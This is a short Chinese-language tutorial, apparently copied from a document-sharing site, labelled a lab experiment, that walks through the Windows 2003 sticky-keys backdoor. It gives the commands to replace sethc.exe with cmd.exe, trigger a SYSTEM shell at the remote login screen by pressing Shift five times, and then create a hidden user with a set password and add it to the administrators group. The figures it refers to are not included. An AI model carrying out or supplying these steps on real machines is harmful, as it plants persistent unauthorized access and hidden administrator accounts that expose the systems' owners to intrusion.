Windows 2003 shift 后门实验
在windows 2003的系统界面下,开始-运行-cmd如图1所示:
回车,出现如图2的界面:
下面进行下一步,进入到system32的目录下,操作如图3所以:
然后备份sethc.exe, 执行如下命令:move sethc.exe sethc.exe.bak如图4所示:
然后修改下面内容,将cmd.exe改成sethc.exe,执行如下命令,copy cmd.exe sethc.exe.如图5:
然后用另外一台客户机远程本机器,操作如图6:
出现如图7的内容:
然后连续按5次shift,出现如图8的界面:
在然后再里面新建用户,如图9所示:
建立账户和密码:net user test admin-t-123 /add
使用net user可以查看当前账户信息同时查看用户是否添加进来。
Test获取administrators账户权限:net localgroup administrator test /add、激活test账户:net user test /active: yes
完成以上步骤,用刚新建的test账号登录。如图10.
出现下面界面登录成功。
所有步骤结束shift后门设置成功!
本文来源:https://www.2haoxitong.net/k/doc/ce5eadd75022aaea998f0ffc.html
文档为doc格式